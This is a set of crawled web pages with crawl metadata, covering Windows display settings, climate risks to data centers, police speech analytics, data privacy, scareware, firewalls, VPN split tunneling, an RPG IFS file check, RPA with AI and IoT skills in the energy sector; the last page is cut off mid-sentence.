s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336674.94/warc/CC-MAIN-20221001132802-20221001162802-00677.warc.gz
en
0.923795
1,033
2.765625
3
You can adjust the screen resolution to change the image quality on the screen. In Windows 10, the user can choose any available resolution on their own, without using third-party programs. Screen resolution is the number of pixels horizontally and vertically. The larger it is the picture becomes clearer. On the other hand, high resolution creates a serious burden on the processor and video card, since you have to process and display more pixels than at low. Because of this, the computer, if it cannot cope with the load, starts to freeze and give errors. Therefore, it is recommended to lower the resolution in order to increase the performance of the device. It is worth considering what resolution is suitable for your monitor. Firstly, each monitor has a bar above which it will not be able to raise quality. For example, if the monitor has 1280×1024 maximum resolution, setting a higher resolution will not work. Secondly, some formats may appear blurry if they do not fit the monitor. Even if you set a higher, but not suitable resolution, then there will be more pixels, but the picture will only get worse. Each monitor has its own optimal resolution standards. As a rule, with increasing resolution, all objects and icons become smaller. But this can be fixed by adjusting the size of the icons, of text apps and elements in the system settings. If several monitors are connected to the computer, then you will have the opportunity to set a different resolution for each of them. This guide will tell you how to determine the screen resolution and set the appropriate parameter for your monitor. How to Find Out the Established Resolution To find out what resolution is currently set, just follow these steps: 1. Right-click in an empty area of the desktop and select the option “Display Settings”. 2. It indicates what resolution is set now. Find Out the Native Monitor Resolution If you want to know which resolution is the maximum or native to the monitor, then there are several options: - Using the method described above, go to the list of possible resolutions and look for the value “recommended” in it, it is native; - Find on the Internet information about the model of your device if you use a laptop or tablet, or monitor model when working with a PC. Usually more detailed data are given on the product manufacturer’s website; - See the instructions and documentation that came with your monitor or device. Perhaps the information you need is on the product box. How to Adjust Screen Resolution in Windows 10 There are several ways to change the resolution. You do not need third-party programs to do this, just the standard Windows 10 tools are enough. After you set a custom new resolution, the system will show how it will look for 15 seconds, after which a window will appear in which you will need to indicate whether to apply the changes or return to the previous settings in Windows. The simplest way is to use system parameters 1. Open Settings in Start Menu. 2. Go to the “System” block. 3. Select the “Display” sub-item. Here you can specify the resolution and scale for the existing screen or configure new monitors. You can change the orientation, but this is only required for non-standard monitors. Consider Using Action1 to Determine Screen Resolution if: - You need to perform an action on multiple computers simultaneously. - You have remote employees with computers not connected to your corporate network.
<urn:uuid:95b7b44f-a4ee-49db-9705-58600b3ed5d4>
CC-MAIN-2022-40
https://www.action1.com/how-to-determine-and-adjust-screen-resolution-windows-10/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00677.warc.gz
en
0.906413
718
3.078125
3
Climate change is impacting more than our wildlife and natural resources. The changing weather can compromise our data centers and lead to numerous performance issues that are both costly and inconvenient. In an increasingly digital world, protecting our data centers is necessary to maintain operations and keep businesses that rely on online networks and servers running successfully. From prolonged heat waves to increasingly severe storms, climate change is causing many challenges for the online world of information technology. Learning about the impacts of climate change on data centers and how to combat these issues is essential. Weather and Data Centers Changing weather patterns are causing uncertainty for digital industries and data center management. Climate change creates the following extreme weather conditions that can negatively impact data centers: - Higher temperatures: According to the National Oceanic and Atmospheric Administration (NOAA), 2021 was Earth’s sixth hottest year on record. Since 1981, the rate of warming has more than doubled. Increasing temperatures can contribute to worsening natural disasters, ranging from deadly heat waves to droughts. - Flooding: Because burning fossil fuels is causing Earth’s atmosphere to increasingly get warmer, the hot air can hold more water vapor and result in heavy rain showers. Even regions away from water sources can face high flood risks because of these downpours. - Humidity: Hotter weather also means higher humidity. In addition to the rising temperatures, the planet has seen a rise in moisture that equates to about four percent per every degree Fahrenheit that the world warms. - Wildfires: Climate change contributes to larger and faster-spreading wildfires that have devastated thousands of miles of forests over the last few years. Russia alone saw a 31% increase in fire-related losses in 2021 because of prolonged heat waves due to the hotter climate. - Droughts: Rising average temperatures are causing the planet’s water cycle to speed up and evaporate more quickly from plants and soil. From 2000 to 2020, about 20% to 70% of the U.S. experienced abnormally dry conditions. - Severe storms: As Earth’s global surface temperatures increase, storms with increasing intensity are more likely to occur. These storms often have accompanying stronger winds and more intense rain or snowfall. How Climate Change Affects Data Centers Explore how data centers are affected by weather changes due to rising surface temperatures. Power outages are one of the most devastating effects of climate change on data centers. Severe weather can strain the power grid infrastructure, which is already struggling to meet demands in the United States. In addition to causing downtime, power outages can cause the following problems for your data center: - Data loss: Your business could lose valuable data if hard drives and servers fail during an outage. - Corrupted files: Sudden loss of power can corrupt your files or cause them to process only partially. - Damaged equipment: Power grid failures can disrupt and damage your data center equipment. Performance Issues and Disruptions High temperatures and severe weather caused by climate change can interfere with your data center’s performance. Data center equipment often requires cooling gear to maintain a safe operating temperature for reliable deployment. The stress of above-normal temperatures can overwork cooling equipment, leading to failure. While most data centers can withstand the impacts of typical severe weather, serious conditions such as prolonged heat waves or extreme flooding caused by climate change can cause untimely disruptions that data centers cannot withstand. Downtime and Unplanned Costs One of the most harmful impacts of climate change on data centers is unplanned downtime. Pausing your operations can come with a price tag because of the associated costs, including: - Reduced productivity: If your business relies on online servers and networks, downtime impacts your team’s ability to access their work and halts productivity. - Data loss: Disruptions and downtime can lead to corrupted files and make your data center vulnerable to costly cyberattacks. - Lost sales: If your operation performs online business, downtime can prevent customers from making purchases, which ultimately impacts your profitability. - Compensation for lost services: If you offer customers compensation for unplanned service interruptions, these costs can add up quickly. - Equipment repairs: When severe weather damages your equipment, you may face downtime while addressing the necessary repairs and component replacements. - Backup generators: Investing in backup power sources is beneficial to reduce downtime and keep your operations up and running. - Lost reputation: Downtime can hurt your company’s reputation. Providing reliable services is crucial to customer loyalty and establishing your services as dependable. Planning for the Unexpected The key to combating the negative effects of climate change on data centers is preparing for the unplanned. Here are a few ways your business or organization can address the high temperatures and severe weather associated with the changing climate. Meet Your Cooling Needs Fighting heat and humidity is crucial for keeping data center equipment functioning at its best. Your business needs effective cooling systems to avoid system overheating and shortening your data center equipment’s life span. The right solutions should help: - Improve airflow. - Maintain an optimal environment. - Reduce energy costs. Finding the right cooling systems will keep your equipment operating at its best and extend its life, helping your business maximize its investments and enjoy more uptime. Find Adequate Power Solutions Every data center requires an uninterruptible power system to combat downtime and boost system reliability. As the digital world continues growing rapidly and climate change increasingly threatens information technology’s stability, arming data centers with the right power solutions can give your business peace of mind. In addition, consider the need for backup generators to minimize unplanned downtime and keep your data center functioning in the face of severe weather. Create a Disaster Recovery Plan With the growing threat of severe weather caused by climate change, organizations should craft a plan of action for unexpected events to maintain uptime. Decide how your business will respond to issues such as power outages or physical damage so you can streamline recovery and get back to normal operations as soon as possible. Choose DataSpan to Protect Your Data Center For almost 50 years, DataSpan has provided our customers with the technology solutions they need to optimize their data centers. Our experienced team is here to help bring your data center to the next level, no matter what happens in the future. From infrastructure to support, we can help your business with data center IT services and storage to help you combat the unexpected and improve your business’s data management. More than half of the Fortune 1000 trust us with their IT operations. Contact DataSpan to learn more about our data center solutions.
<urn:uuid:38643dcb-7afd-4501-a86f-efd7156ee20b>
CC-MAIN-2022-40
https://dataspan.com/blog/effects-of-climate-change-on-data-centers/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337631.84/warc/CC-MAIN-20221005140739-20221005170739-00677.warc.gz
en
0.914635
1,371
3.484375
3
- A recent study at the University of Michigan suggests that attention and short-term memory processing are directly affected by a person’s surroundings and environment, with noisy environments reducing significantly memory performance - The human brain can only hold about seven pieces of information for less than 30 seconds. With those two facts in mind, one can only imagine how tough it can be for call handlers in the police force to gain a comprehensive understanding of the situation and pick up on distress signals. Dealing with over 21,000 calls a day; the police force is a highly pressurised environment where speed, accuracy and ability to capture important information and signs of distress are imperative. Failing to do so could not only jeopardize the safety of the caller, but it could also result in loss of public trust and potential further funding. How can Speech Analytics help you protect your call handlers, serve the public and control operational costs? Speech Analytics technology is capable of quickly searching through live (real-time) and historic calls and highlighting those that fit pre-established criteria. Real-Time Speech Analytics automatically captures and analyses the entire call interaction as it unfolds, to uncover information that is potentially ‘hidden between the lines’, by isolating specific words, phrases and tone of voice are some of them. Thanks to a sophisticated linguistic analytics module, it identifies keywords and phrases and picks up information from all aspects of the conversation. Furthermore, it takes into account additional caller and contextual information, before making its next-best-action recommendation. Why is this important? The Police force receives over 21,000 calls every day, 25% of which are characterized as urgent. Real-Time Speech Analytics acts as a second pair of ears, picking up and alerting call handlers on issues that could otherwise be missed due to factors like noise, line quality, accent and articulation of the caller etc. These details could be of extreme importance when trying to distinguish between an emergency and non-emergency call and ensure that further action is based on correct data. Speech Analytics also scans over historic calls and interviews to help identify drivers, highlight reoccurring trends and even locate historic recordings based on newly established intelligence. Moreover, using Speech Analytics to evaluate historic calls can contribute in improving processes and making training more effective. As a training tool, Speech Analytics eliminate the need for random call selection by finding the right calls to support more targeted and tailored training. By better training call handlers to pick up on important queues and overall handle calls in a more efficient and professional manner, the chances of customer complaints and failing duty of care decrease. With Speech Analytics, the police force control rooms have the opportunity to: - Achieve compliance adherence by ensuring call handling protocols are being met - Meet targets with greater process efficiency and reduced costs - Find relevant calls for training and improved processes - Increase its crime intelligence and act on calls more efficiently for better results - Minimise repeat calls by understanding root cause for call backs Check out our Speech Analytics Advice Hub for more information on this game changer technology.
<urn:uuid:f3603e5c-e05e-45d3-9c91-905d919cb496>
CC-MAIN-2022-40
https://bslgroup.com/speech-analytics-in-the-police-force-control-room/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00077.warc.gz
en
0.933427
628
2.625
3
In a very interconnected world, it’s imperative that we remember to safeguard our data security. The National Cyber Security Alliance (NCSA), the organization that heads Cyber Security Awareness month each October, has been leading an effort to raise awareness to this issue since 2011, but the history of it goes back to 1981. Data Privacy Day began in the United States and Canada in January 2008 as an extension of the Data Protection Day celebration in Europe. Data Protection Day commemorates the Jan. 28, 1981, signing of Convention 108, the first legally binding international treaty dealing with privacy and data protection. Data Privacy Day is now a celebration for everyone, observed annually on Jan. 28. The National Cyber Security Alliance (NCSA) assumed leadership of Data Privacy Day from the Privacy Projects in August 2011. A nonprofit, public-private partnership dedicated to promoting a safer, more secure and more trusted Internet, NCSA is advised by a distinguished advisory committee of privacy professionals. So, what can you do to get involved in this awareness? The Alliance offers a couple suggestions: - At work, encourage a culture that respects and values data privacy. Teach employees how easily privacy breaches can occur with negligent internet use in the workplace, and what the impact can be on the company. Review data security best practices that can help prevent malicious software from entering the network. Share this infographic from NCSA called Privacy is Good for Business. - At home, talk with your kids about safe internet use. Read a list of tips for parents here. It will probably be a good refresher for adults as well because poor internet security practices are easy to slip into. And finally, here are a few tips they provide for ensuring privacy in the workplace: Personal information may be valuable to your business, but it’s also something your customers value. Consider taking the following actions to create a culture of respecting privacy, safeguarding data and enabling trust in your organization. If you collect it, protect it. Follow reasonable security measures to protect individuals’ personal information from inappropriate and unauthorized access. Be open and honest about how you collect, use and share personal information. Clearly communicate your privacy practices and any tools you offer consumers to manage their data. Don’t count on your privacy notice as your only tool to educate consumers about your data practices. Communicate clearly and often to the public about what privacy means to your organization and the steps you take to achieve and maintain privacy and security. Create a culture of privacy in your organization. Educate employees about their role in privacy, security, respecting and protecting the personal information of colleagues and customers. Conduct due diligence and maintain oversight of partners and vendors. You are also responsible for how they use and collect personal information. We take data security seriously at Great Lakes Computer. We offer a range of services, like antivirus, cloud computing, and digital forensics, that can help you protect your most valuable asset, your information. If you feel you don’t have the level of protection you need, contact us today.
<urn:uuid:0e22a2f3-3e65-467a-bdc3-1660f23da881>
CC-MAIN-2022-40
https://greatlakescomputer.com/blog/data-security-tip-january-28th-is-national-data-privacy-day
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00077.warc.gz
en
0.926572
624
3
3
What is Scareware: You’ve probably seen the pop-ups — “Warning! A virus has been detected on your computer. Download VirusBlaster to clean and remove it.” The malware that infects your computer is the program that pop-up is trying to trick you into downloading. Scareware can come in a variety of forms, from fake antivirus programs to fake browsers or software updates. What makes protection a challenge: We know that social engineering works because it preys on the distracted and mentally fatigued. Combine that with eagerness to please or help and thus begins the “good intentions” downward spiral that leads employees to make terrible decisions. Once scareware gets inside the system, it has all the privileges, passwords, and logins of the employee who installed it. Getting it out may be as easy as just wiping the system and starting fresh or recovering from backup. Or it may be more difficult and timeconsuming if the malware spreads to other systems. Want to discuss it further, contact us today! COMMON SECURITY THREATS SERIES Learn about other security threats you might be up against:
<urn:uuid:5688e21c-ea69-48a6-90f4-418015e09d17>
CC-MAIN-2022-40
https://www.irangers.com/common-security-threats-scareware/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00077.warc.gz
en
0.927939
238
2.59375
3
By now, most people understand the importance of staying safe when browsing the Internet. Without proper anti-virus programs and firewall support, the infrastructure of any establishment can come crumbling to the ground. But before you invest in any type of firewall support, it’s important to know the facts, and there are countless misconceptions about web security floating around. Here are some of the most common myths about firewalls. Firewalls and virus protection programs are one and the same. Many people are under the impression that firewalls and virus protection programs are synonymous terms. While they do fall under the general umbrella category of Internet security, it’s important to make the distinction that viruses can indeed pass through a firewall. Viruses can sometimes penetrate and even shut down firewalls too, so it’s best to install a virus protection program in addition to running a firewall. Working with professional firewall consultants can help you determine your business’ security needs. Outside threats are the only type that an IT infrastructure needs protection against. This is a very popular yet untrue claim; surprisingly, an IT infrastructure can be attacked from the inside as well as the outside. More than half of survey respondents say their organization currently transfers sensitive or confidential data to the cloud, and many people would be shocked to find out just how common internal risks are. Reaching out to firewall experts is the best way to discover your IT infrastructure’s internal threats. Firewalls are guaranteed to work as intended. As with any type of digital hardware or software, the effectiveness of a firewall cannot be guaranteed. There will always be dark web users who find devious ways of breaking through even the best firewalls. This doesn’t mean you should give up hope of securing your IT infrastructure; rather, it should serve as a perpetual reminder to prioritize cybersecurity and reach out to firewall specialists to help optimize your digital security system and offer as much protection as possible. Ultimately, being aware of these common firewall misconceptions can help you make the most logical decisions regarding your company’s Internet security. If you’re in need of high quality digital security equipment, consider Meraki, which had an installed base of 160,000 customers at the end of 2016 and 2 million devices connected globally. For more information about Meraki equipment, contact Manhattan Tech Support.
<urn:uuid:abbd208e-6f58-4051-b48d-ee26eac3344b>
CC-MAIN-2022-40
https://www.manhattantechsupport.com/blog/debunking-3-ridiculous-myths-firewalls/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335058.80/warc/CC-MAIN-20220927194248-20220927224248-00077.warc.gz
en
0.932554
478
2.984375
3
Intelligence Lead Cyber Defense A sound defence needs more than technology. Alongside advancements in machine learning and artificial intelligence, there remains a vital role for human insight and ability. At heart, cyber is a field of conflict – a contest over access to data. To allocate resources effectively and win that fight, defenders need consider the attacker’s perspective. Only by understanding what is under threat and what the likely attacks are can defenders allocate defences effectively. Ideal for technical leaders explaining priorities to non-technical managers, this webinar discusses how to understand, assess, and defend against cyber-attack using widespread offensive techniques to discuss how best to develop defensive strategy.
<urn:uuid:ab8923fc-7954-47b3-9d51-dba22c1cff6a>
CC-MAIN-2022-40
https://cyware.com/cyber-security-events/webinar/intelligence-lead-cyber-defense-fb9ee1e4/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00077.warc.gz
en
0.92489
135
2.546875
3
Many people are using the Integrated File System (IFS) to store source code and HTML pages and to stage converted database files that are being sent or received between heterogeneous systems. Now, with OS/400 V5R2's "Type 2" IFS files, it is actually much less of a performance issue to use the IFS than before. One question I am frequently asked is how to determine if a file exists on the IFS. There are several methods to accomplish this, but probably the easiest and safest way is to call the access() procedure. The C runtime function name access() allows you to test a file on the IFS for read/write access or existence. The IFS API manual tells us that the access() procedure is prototyped, in C, as follows: This C prototype doesn't do us much good in RPG. We need to convert it to an RPG IV prototype. Illustrated below is the RPG IV prototype for the access() procedure. D szIFSFile * Value OPTIONS(*STRING) D nAccessMode 10I 0 VALUE The access() procedure returns 0 if the test succeeds. For example, if you check for file existence and the file exists, 0 is returned. Of course, to check for the existence of a file, you have to tell the access() procedure what you want to do. To do that, you must specify on the second parameter the type of file access you want. The options for the second parameter are as follows: D W_OK C Const(2) D F_OK C Const(0) It is always better programming to use named constants rather than hard-coded numbers, hence the R_OK, W_OK, and F_OK named constants. If you read the access() documentation, you see that the C language predefines these constants for you (in C language, of course). For example, to check to see if the file CUSTMAST.TXT exists in the /MYFILES directory, you could use the following: C if access(szIFSFile : F_OK) = 0 // The file exists!! In this example, the IFS file name is stored as a named constant (line 1), and on line 2, the access() procedure is called to test for its existence. If it is found, a 0 is returned and processing continues. As is always the case, to use any of the C runtime library functions, you must include the QC2LE binding directory. As a matter of practice, I always include it in the H-spec for my source code. Here's a typical Header specification from one of my source members: Bob Cozzi has been programming in RPG since 1978. Since then, he has written many articles and several books, including The Modern RPG Language--the most widely used RPG reference manual in the world. Bob is also a very popular speaker at industry events such as RPG World and is the author of his own Web site and of the RPG ToolKit, an add-on library for RPG IV programmers.
<urn:uuid:c2f1a640-1c54-472c-9fc6-7774ca0b1dca>
CC-MAIN-2022-40
https://www.mcpressonline.com/programming/rpg/tips-and-techniques-does-your-file-exist-on-the-ifs/print
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00077.warc.gz
en
0.927667
675
2.640625
3
What You Need to Know About Split Tunneling Today’s modern networks require flexibility to allow workers to work from multiple locations. One of the most common methods to achieve remote network access is a Virtual Private Network (VPN). VPN’s can come in all shapes and sizes, from hosted to on-premises, to in the cloud, and can be built to fit all needs. However, one topic that is often overlooked is whether or not to allow VPN users to utilize split tunneling. Webopedia defines split tunneling as “The process of allowing a remote VPN user to access a public network, most commonly the Internet, at the same time that the user is allowed to access resources on the VPN.” The idea is a user has a tunnel to the corporate network to access any apps or shared drives through the VPN connection while still utilizing the local internet connection of the remote user for access to the web or local resources. In terms of security, by enabling split tunneling you now have an open connection to your network which can send/receive traffic which does not pass through your organization’s perimeter security devices such as a firewall, IPS or IDS. This creates a situation where your organization cannot monitor web traffic on the remote device through the VPN connection. Utilizing a split tunnel can also increase the possibility of data exfiltration out of the organization. If any controls are in place to prevent copy and pasting of data, these controls may now be ineffective because traffic is being sent outside of the organization’s Data Loss Prevention system (DLP). While it is certainly possible for this to occur with a full VPN tunnel, the task of preventing that data loss becomes much more difficult with a split VPN tunnel. Another potential loss of security could be a result of the remote VPN user utilizing a public Internet connection. That user’s web traffic would not be encrypted by a VPN tunnel. As a result, any data not sent over the VPN can be susceptible to snooping if an unsecured protocol is used. How to Mitigate the Risk of Split Tunneling Protections to mitigate the risk of split tunneling should include first and foremost a valid BAA, which requires the third parties to verify the remote workstations are protected. For internal employees and contractors, the Acceptable Use Policy (AUP) should be signed and must outline the acceptable use of equipment. Secondly, employers should provide training to demonstrate the acceptable and non-acceptable uses of the device. As far as the technical controls, a VPN agent, which can perform a health check and verify the device is compliant, should be implemented. This health check should verify that the operating system patches are installed, an anti-virus is installed, running and is updating regularly. Additionally, it is common practice to place a firewall in front of the VPN traffic however this firewall is generally not as robust as the perimeter firewall. A VPN firewall is the only protection for your network against malicious traffic traversing that VPN tunnel. If the proper configuration of the VPN firewall is in place it will protect your network against any malicious VPN traffic but it is a single layer of defense. As IT security is becoming more prominent it is common practice to implement multiple layers of defense in place to prevent a breach of data. One of the most effective protections an organization can implement is strong network segmentation. Remote users should be limited to only access the systems that are required to perform their job functions. Restrictions should be in place to segment your network to prevent unlimited network access for remote users. It is all too common that our security professionals see remote-access VPNs that allow for complete unrestricted network access. Segmenting VPN connections to access only the required systems is paramount in creating a strong security posture. A strong network-wide segmentation practice can be the deciding factor in whether a company will experience a minor breach or a massive breach. Split tunneling has its benefits. A split tunnel VPN will provide the remote user the fastest web browsing speed as now they can utilize the ISP they’re connected too instead of sending that traffic back through the business’s network. From a network standpoint, it will decrease the bandwidth in use for the VPN traffic as now only business functions will be sent over the VPN and other traffic will flow directly through the remote users’ ISP connection. And remote workers can print to their local network printer while connected to the VPN — a minor issue but one we ofter hear about. Is Split Tunneling Compatible with the HITRUST Framework? As HITRUST Assessors, we are often asked if split tunneling is allowed for remote VPN connections. HITRUST itself does have a specific requirement prohibiting split-tunnel VPNs (Domain 8 requirement – Remote devices establishing a non-remote connection are not allowed to communicate with external (remote) resources). But this is not common in the Cyber Security Framework 9.2 and is only applicable to larger organizations. So the decision to allow a split-tunnel VPN will boil down to a few things. One is there a legal or compliance requirement that must be satisfied? Two does the reward of split tunnel VPNs outweigh the risk? And third, how much do you trust the employees, contractors or vendors who may be utilizing that split-tunnel VPN? Once an organization answers these three questions they can make a determination if a split-tunnel VPN works for their organization. By Josh Perri, Intraprise Health Information Security Consultant
<urn:uuid:bd7c4eef-388a-4cfd-b60b-3b7afe5923d5>
CC-MAIN-2022-40
https://intraprisehealth.com/what-you-need-to-know-about-split-tunneling/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00077.warc.gz
en
0.929134
1,125
2.703125
3
Given their inherent similarities, it's entirely logical that robotic process automation and artificial intelligence would havecrossover in a variety of different contexts. Both of these technologies are contingent upon bringing order to processes - usually workflows, in either the physical or digital realm - that might otherwise run the risk of falling into disorder for any number of reasons, most notably human error. RPA and AI are perfectly capable of operating on their own, and in fact often do. Yet recent evidence suggests systems in which the two automation-focused methods work together may become increasinglycommon in the not-too-distant future. RPA and AI are working alongside each other in various business applications. Organizationsconsidering implementing one or the other to manage any of their operations would serve themselves well by examining how they're being used in tandem. It's also worth investigating how a versatile low-code business application development platform like Appian may beidealfor creating tools to most successfully leverage symbiotic RPA and AI. According to InformationAge, it can often be easier for most organizations to implement RPA in advance of AI, especially in instances where they are still reliant to some degree on legacy systems: hardware, software or both. Complete overhauls of companies' existing tools forbusiness process managementin favor of more advanced technologies are quite difficult, as they can't be accomplished quickly - and, in some instances, aren't realistic at all. The better approach, then, is to use the addition of something like RPA as a table-setter for more substantive changes to operating methods. With that being said, the increasing frequency with which RPA and AI are comingas a package deal meansBPM advancements or overhauls won't be quite as complex to manage in the next few years. AI-enhanced RPA platforms that automate various organizational workflows and processes either in whole or in part, referred to asCPRA - cognitive robotic process automation - are gradually becoming the norm, in yet another example of how truly pervasive digital transformation has become across multiple segments of both the public and private sectors. Without a doubt, the business of pharmaceutical development and production is one of the most highly regulated sectors in the world, in no small part because it's characterized by numerous complex processes. One mistake in the chemical formulation of a particular drug - or a flaw in the physical steps of manufacturing tablets, capsules, liquids or other forms of medication - can lead to illnesses and even deaths among users, which can open up the drug company that is responsible to a surfeit of civil or even criminal penalties, in addition to various regulatory sanctions. Because of this, it's of the utmost importance for pharmaceutical businesses to implement numerous fail-safes in their BPM practices, and the combination of RPA and AI can help provide these precautionary measures. According to Robotics and Automation News, major companies in this field may well consider this path in light of the success recently seen byAstraZeneca, one of the world's biggest pharmaceutical producers, when it commissioned the services of Deloitte in pursuit of an RPA implementation. While this would by no means be the first time that an organization within the general sphere of health care adopted RPA, CRPA, AI or some combination thereof, no one in the pharmaceutical field had tried using such technologies to handle the specific task of "adverse event reports." Other pharma businesses might use a different term for these filings, but the meaning is likely the same: reports of detrimental side effects in patients who have used a particular drug. Cognitive RPA improved the adverse events reporting processes of a major pharma company. AstraZenecareceives an average of 100,000 adverse event reports each year - many documenting minor ailments but some detailing serious illnesses. Before the firm enlisted a major business solutions provider to devise an advanced RPA system for this purpose, it dealt with these reports manually. As such, members of the AstraZenecapatient safety team were spending millions of hours every year personally administering whatever tasks were necessary to ensure patients' adverse experiences were dealt with appropriately. Because individuals' health is at stake in such cases, care and sensitivity are essential - not to mention the initiation of any adjustments that can be made to the drug - but certain routine administrative processes could be (and were) automated through the RPA platform. Robotics and Automation News noted that this RPA use case was a considerable success, bolstering response rates from both health care professionals involved in drug trials and AstraZeneca staff. Although similar solutions will have to undergo rigorous compliance testing via computer systems validation, as this one did, high-level CRPAapplication platforms will likely be adopted more broadly throughout the sector. According to a January 2018 study conducted by Capgemini, 24 percent of surveyed individuals stated that they would, given the opportunity, use voice-activated digital assistants or chatbots to complete various purchases rather than doing so through direct interaction with a website. Additionally, the research found that Amazon Alexa, Google Assistant, Apple's Siri and IBM's Watson, along with any other similar applications that will likely emerge in the next three years, will stake claims as a dominant channel of commerce for average consumers. Even if voice-activated assistants don't quite reach heights that can be considered "dominance," it's practically a given that they'll grow in popularity between now and 2021 or 2022, as their price points go down and they become accessible to a wider range of customers. The symbiotic operation of RPA and AI grants these systems their effectiveness. An AI platform, as present in any of the aforementioned assistants, can generally understand a typical human question or command - "Siri, set a timer for two hours," or "Alexa, what's the current record of the Boston Celtics?" - but an RPA cannot. Conversely, the AI can't complete the nuts-and-bolts processes handled by the RPA. When combined, however, the AI translates the voice command into a series of simpler signals, sends them to the RPA as requests to locate relevant data packets, receives this data and finally converts it into a natural response: "Timer set for two hours," "The Boston Celtics are 9-8, 6th place in the NBA Eastern Conference" and so on. As RPA and AI develop further in the years to come, their capabilities will grow: AIs will potentiallycatch on to the slang and syntax of their users instead of requiring that questions be asked in formal sentences, while RPAs grow capable of collecting more complex requests based on prompts. As a result, their fusion can only bring about greater advances, in voice assistant technology and much, much more. It's not uncommon for employees to fear that automation will marginalize or eliminate their jobs. However, as Forbes Technology Council contributor Kris Fitzgeraldpoints out, this may not be the case in most industries: Hybrid RPA and AI systems take the burden of paperwork, data entry and other time-consuming tasks away from employees - particularly those dealing with customer service, in numerous sectors - and therefore allow them to put their intrapersonal skills to greater use. Fitzgeraldnoted that hotels have seen a great deal of success employing RPA and AI together for various customer-facing needs, and that managing invoice processing represents another notably broad use case for these united technologies. Excited as you may be to implement united RPA and AI tools through your business, it's critical that your staff have easy access to these functions and can fit them naturally into their individual workloads. Appian's high-speed, low-code application development platform allows enterprises to quickly craft the sort of apps and portals that simplify the use of these advanced tools across the workforce and help employees leverage their benefits quickly and efficiently. Appian is the unified platform for change. We accelerate customers’ businesses by discovering, designing, and automating their most important processes. The Appian Low-Code Platform combines the key capabilities needed to get work done faster, Process Mining + Workflow + Automation, in a unified low-code platform. Appian is open, enterprise-grade, and trusted by industry leaders.
<urn:uuid:d62bb054-1d5a-46f2-a6df-14c851563905>
CC-MAIN-2022-40
https://appian.com/blog/2018/the-growing-symbiosis-between-rpa-and-ai.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00077.warc.gz
en
0.955968
1,660
2.765625
3
Internet users in the United States are dangerously ignorant about the type of data that website owners collect from them and how that data is used, making them vulnerable to fraud and misuse of their personal information, a new study finds. For the study, titled “Open to Exploitation: American Shoppers Online and Offline,” 1,500 adult U.S. Internet users were asked true-or-false questions about topics such as website privacy policies. The survey was conducted by the University of Pennsylvania’s Annenberg Public Policy Center and released last month. Respondents generally failed the test, answering an average of seven out of 17 questions correctly. The study’s interviews, conducted between early February and mid-March, yielded findings the authors consider alarming, including: 49% can’t identify “phishing” scam e-mail messages, whose designs mimic the legititimate companies they purport to represent in order to lure users into entering sensitive information such as Social Security numbers. 68% can’t name any of the three credit reporting agencies that enable consumers to monitor for attempts at identity theft.
<urn:uuid:99d18bac-e694-4835-8c42-8c4c45b2a6af>
CC-MAIN-2022-40
https://www.cio.com/article/252770/it-strategy-e-commerce-internet-users-ignorant-about-data-privacy.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334515.14/warc/CC-MAIN-20220925070216-20220925100216-00277.warc.gz
en
0.944025
346
2.671875
3
New research from satellite communications provider Inmarsat suggests that a skills gap in fields such as data security, analytical data science and technical support could put the brakes on IoT innovation in the energy sector. According to the latest research from Inmarsat, more than a third of energy companies lack the skills they need to successfully deploy IoT technology. That statistic applies at both management and delivery levels. The conclusion then, is that a recruitment drive is needed if IoT technology is to bring about innovation, efficiency and productivity in the energy industry. The independent research commissioned by Inmarsat found that the level of unpreparedness was remarkably high, despite the fact that the vast majority of energy companies are planning IoT applications. Energy industry is lacking IoT skills On behalf of Inmarsat, market research specialist Vanson Bourne interviewed respondents from 100 international energy companies. Specifically, they found that while 88 percent aim to deploy IoT technologies before the end of 2019, many currently lack the skills needed to do so effectively. In fact, more than one third (35 percent) believe that they lack the management skills to fully utilize IoT, while 43 percent reported a skills shortage at a delivery level. The majority (53 percent) stated that they would benefit from additional skills at a strategic level to take full advantage of IoT. These skills shortages were most prevalent in cyber security (54 percent) and technical support (49 percent). Respondents also pointed to analytical and data science as areas of high demand. Energy companies without the required skills will fail to realize benefits of IoT The complexity of the IoT stretches from installation and implementation to data analysis. A highly-skilled workforce is needed to get these systems in place, maintain them and make the best use of them. Chuck Moseley, senior director for energy at Inmarsat Enterprise, said “Whether they work with fossil fuels or renewables, IoT offers energy companies the potential to streamline their processes and reduce costs in previously unimagined ways. Smart sensors, for example, can facilitate the collection of information at every stage of production, enabling them to acquire a higher level of intelligence on how their operations are functioning and to therefore work smarter, more productively and more competitively.” “But fully realizing these benefits depends on energy companies’ access to appropriately-skilled members of staff and it is clear from our research that there are considerable skills gaps in the sector at all stages of IoT deployment.” Crucially, the need for skills in IoT will increase in the coming years as more companies adopt emerging technologies. “IoT is set to have a similarly transformative effect on a whole swathe of industries, so it’s likely that the pressure on skills will only increase,” he said. “Energy companies who currently lack these capabilities in-house will find themselves in a heated recruitment battle for this talent, with Silicon Valley, in particular, offering an attractive alternative.” The challenge for energy companies: upskill, attract or rely on partners Moseley also highlighted the role that partners could play in addressing the deficiencies facing many energy companies. “There are undoubtedly steps that energy companies can and should take to upskill their staff and attract fresh talent with the appropriate skills, but the growing demand in the market for these skills means that bottlenecks will be hard to avoid altogether.” “This will make partners, who have greater economies of scale and more concentrated expertise on their side, critical for those looking to 